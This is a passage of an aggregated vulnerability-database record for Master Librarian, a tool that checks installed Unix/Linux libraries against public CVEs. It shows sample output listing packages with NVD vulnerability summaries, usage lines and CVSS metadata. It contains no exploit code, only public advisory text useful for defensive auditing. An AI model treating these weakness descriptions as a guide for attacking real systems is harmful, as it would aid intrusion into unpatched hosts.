3.8.4, sys.path restrictions specified in a python38._pth file are ignored, allowing code to be loaded from arbitrary locations. The <executable-name>._pth file (e.g., the python._pth file) is not affected. https://nvd.nist.gov/vuln/detail/CVE-2020-15801 7.5 HIGH In Python 3.6 through 3.6.10, 3.7 through 3.7.8, 3.8 through 3.8.4rc1, and 3.9 through 3.9.0b4 on Windows, a Trojan horse python3.dll might be used in cases where CPython is embedded in a native application. This occurs because python3X.dll may use an invalid search path for python3.dll loading (after Py_SetPath has been used). NOTE: this issue CANNOT occur when using python.exe from a standard (non-embedded) Python installation on Windows. https://nvd.nist.gov/vuln/detail/CVE-2020-15523 6.9 MEDIUM xineramaproto 1.2.1 xcb-render 1.14 libpcre2-32 10.34 libbsd-ctor 0.10.0 libbsd 0.10.0 nlist.c in libbsd before 0.10.0 has an out-of-bounds read during a comparison for a symbol name from the string table (strtab). https://nvd.nist.gov/vuln/detail/CVE-2019-20367 6.4 MEDIUM xft 2.3.3 \">\n \n \n Master librarian v0.3 \n Tool to search public vulnerabilities on local libraries \n by CoolerVoid \n \n Example: \n \t$ python3 master_librarian.py -t csv \n \t$ python3 master_librarian.py -t txt -l 3 \n \n Master librarian v0.3 \n Tool to search public vulnerabilities on local libraries \n by CoolerVoid \n \n Search pitfalls in operational system local packages \n \n xres 1.2.0 \n cairo-ps 1.16.0 \n xf86vidmodeproto 2.3.1 \n libcrypto 1.1.1f \n damageproto 1.2.1 \n libffi 3.3 \n xfixes 5.0.3 \n \t\tInteger overflow in X.org libXfixes before 5.0.3 on 32-bit platforms might allow remote X servers to gain privileges via a length value of INT_MAX, which triggers the client to stop reading data and get out of sync. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2016-7944 \n \t\t7.5 HIGH \n \n system.web.extensions.design_1.0 1.0.61025.0 \n kbproto 1.0.7 \n gio-unix-2.0 2.64.6 \n gdk-x11-2.0 2.24.32 \n sqlite3 3.31.1 \n cairo-png 1.16.0 \n lib pcre2-posix 10.34 \n wcf 6.8.0.105 \n dmxproto 2.3.1 \n cairo-script 1.16.0 \n xext 1.3.4 \n x11 1.6.9 \n system.web.mvc 1.0.0.0 \n mono-cairo 6.8.0.105 \n cecil 6.8.0.105 \n udev 245 \n \t\tThe default configuration of udev on Linux does not warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2011-0640 \n \t\t6.9 MEDIUM \n \n \t\tplymouth-pretrigger.sh in dracut and udev, when running on Fedora 13 and 14, sets weak permissions for the /dev/systty device file, which allows remote authenticated users to read terminal data from tty0 for local users. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2010-4176 \n \t\t4.0 MEDIUM \n \n xkeyboard-config 2.29 \n bash-completion 2.10 \n yelp-xsl 3.36.0 \n xdamage 1.1.5 \n libgdiplus 6.0.4 \n icu-uc 66.1 \n xcomposite 0.4.5 \n harfbuzz 2.6.4 \n pixman-1 0.38.4 \n pthread-stubs 0.4 \n systemd 245 \n \t\tAn exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2020-13529 \n \t\t2.9 LOW \n \n \t\tsystemd through v245 mishandles numerical usernames such as ones composed of decimal digits or 0x followed by hex digits, as demonstrated by use of root privileges when privileges of the 0x0 user account were intended. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000082. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2020-13776 \n \t\t6.2 MEDIUM \n \n \t\tA heap use-after-free vulnerability was found in systemd before version v245-rc1, where asynchronous Polkit queries are performed while handling dbus messages. A local unprivileged attacker can abuse this flaw to crash systemd services or potentially execute code and elevate their privileges, by sending specially crafted dbus messages. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2020-1712 \n \t\t4.6 MEDIUM \n \n expat 2.2.9 \n pangocairo 1.44.7 \n xdmcp 1.1.3 \n libpcreposix 8.39 \n ruby-2.7 2.7.0 \n glib-2.0 2.64.6 \n gnome-system-tools 3.0.0 \n xinerama 1.1.4 \n nunit 2.6.3 \n gmp 6.2.0 \n libevent 2.1.11-stable \n xbuild12 12.0 \n xorg-sgml-doctools 1.11 \n presentproto 1.2 \n gdk-pixbuf-2.0 2.40.0 \n inputproto 2.3.2 \n libssl 1.1.1f \n xcb-shm 1.14 \n gdk-2.0 2.24.32 \n libpng16 1.6.37 \n bigreqsproto 1.1.2 \n icu-io 66.1 \n xextproto 7.3.0 \n libthai 0.1.28 \n libbsd-overlay 0.10.0 \n mount 2.34.0 \n gio-2.0 2.64.6 \n adwaita-icon-theme 3.36.1 \n fontconfig 2.13.1 \n xrandr 1.5.2 \n monosgen-2 6.8.0.105 \n mono 6.8.0.105 \n xf86d gaproto 2.1 \n dri3proto 1.2 \n libpcre 8.39 \n pangoxft 1.44.7 \n blkid 2.34.0 \n libsepol 3.0 \n libevent_openssl 2.1.11-stable \n uuid 2.34.0 \n gmodule-2.0 2.64.6 \n graphite2 3.0.1 \n libfl 2.6.4 \n zlib 1.2.11 \n cairo-pdf 1.16.0 \n ruby 2.7.0 \n \t\tAddressable is an alternative implementation to the URI implementation that is part of Ruby's standard library. An uncontrolled resource consumption vulnerability exists after version 2.3.0 through version 2.7.0. Within the URI template implementation in Addressable, a maliciously crafted template may result in uncontrolled resource consumption, leading to denial of service when matched against a URI. In typical usage, templates would not normally be read from untrusted user input, but nonetheless, no previous security advisory for Addressable has cautioned against doing this. Users of the parsing capabilities in Addressable but not the URI template capabilities are unaffected. The vulnerability is patched in version 2 .8.0. As a workaround, only create Template objects from trusted sources that have been validated not to produce catastrophic backtracking. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2021-32740 \n \t\t5.0 MEDIUM \n \n \t\tAn issue was discovered in Ruby 2.5.x through 2.5.7, 2.6.x through 2.6.5, and 2.7.0. If a victim calls BasicSocket#read_nonblock(requested_size, buffer, exception: false), the method resizes the buffer to fit the requested size, but no data is copied. Thus, the buffer string provides the previous value of the heap. This may expose possibly sensitive data from the interpreter. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2020-10933 \n \t\t5.0 MEDIUM \n \n libevent_extra 2.1.11-stable \n system.web.mvc3 3.0.0.0 \n libstartup-notification-1.0 0.12 \n mono-2 6.8.0.105 \n mono-nunit 2.6.3 \n gobject-2.0 2.64.6 \n glproto 1.4.17 \n cairo-ft 1.16.0 \n \t\tcairo 1.16.0, in cairo_ft_apply_variations() in cairo-ft-font.c, would free memory using a free function incompa tible with WebKit's fastMalloc, leading to an application crash with a \"free(): invalid pointer\" error. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2018-19876 \n \t\t4.3 MEDIUM \n \n xcb 1.14 \n \t\tDirectory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2016-0752 \n \t\t5.0 MEDIUM \n \n fribidi 1.0.8 \n xtrans 1.4.0 \n cairo-xlib-xrender 1.16.0 \n mono-lineeditor 0.2.1 \n xcmiscproto 1.2.2 \n gmodule-no-export-2.0 2.64.6 \n dri2proto 2.8 \n python3-embed 3.8 \n libpcre32 8.39 \n system.web.mvc2 2.0.0.0 \n dotnet 6.8.0.105 \n iso-codes 4.4 \n fontutil 1.3.1 \n xbitmaps 1.1.1 \n system.web.extensions_1.0 1.0.61025.0 \n recordproto 1.14.2 \n resourceproto 1. 2.0 \n mobile-broadband-provider-info 20190618 \n videoproto 2.3.3 \n libevent_core 2.1.11-stable \n fontsproto 2.1.3 \n xsp-4 4.2 \n python3 3.8 \n \t\tIn Python 3.8.4, sys.path restrictions specified in a python38._pth file are ignored, allowing code to be loaded from arbitrary locations. The <executable-name>._pth file (e.g., the python._pth file) is not affected. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2020-15801 \n \t\t7.5 HIGH \n \n \t\tIn Python 3.6 through 3.6.10, 3.7 through 3.7.8, 3.8 through 3.8.4rc1, and 3.9 through 3.9.0b4 on Windows, a Trojan horse python3.dll might be used in cases where CPython is embedded in a native application. This occurs because python3X.dll may use an invalid search path for python3.dll loading (after Py_SetPath has been used). NOTE: this issue CANNOT occur when using python.exe from a standard (non-embedded) Python installation on Windows. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2020-15523 \n \t\t6.9 MEDIUM \n \n xineramapro to 1.2.1 \n xcb-render 1.14 \n libpcre2-32 10.34 \n libbsd-ctor 0.10.0 \n libbsd 0.10.0 \n \t\tnlist.c in libbsd before 0.10.0 has an out-of-bounds read during a comparison for a symbol name from the string table (strtab). \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2019-20367 \n \t\t6.4 MEDIUM \n \n xft 2.3.3 \n \n \n\nTested in Ubuntu Linux, Fedora Linux and FreeBSD.\n\nThe purpose of this tool is to use in local pentest, take attention if you have a proper [authorization](<https://www.kitploit.com/search/label/Authorization> \"authorization\" ) before to use that. I do not have responsibility for your actions. You can use a hammer to construct a house or destroy it, choose the law path, don't be a bad guy, remember.\n\n \n \n\n\n**[Download Master_Librarian](<https://github.com/CoolerVoid/master_librarian> \"Download Master_Librarian\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-09T20:30:00", "type": "kitploit", "title": "Master_Librarian - A Simple Tool To Audit Unix/*BSD/Linux System Libraries To Find Public Security Vulnerabilities", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4176", "CVE-2011-0640", "CVE-2016-0752", "CVE-2016-7944", "CVE-2017-1000082", "CVE-2018-19876", "CVE-2019-20367", "CVE-2020-10933", "CVE-2020-13529", "CVE-2020-13776", "CVE-2020-15523", "CVE-2020-15801", "CVE-2020-1712", "CVE-2021-32740"], "modified": "2022-03-09T20:30:00", "id": "KITPLOIT:2401425074991132396", "href": "http://www.kitploit.com/2022/03/masterlibrarian-simple-tool-to-audit.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
ruby-actionpack-3.2 - security update
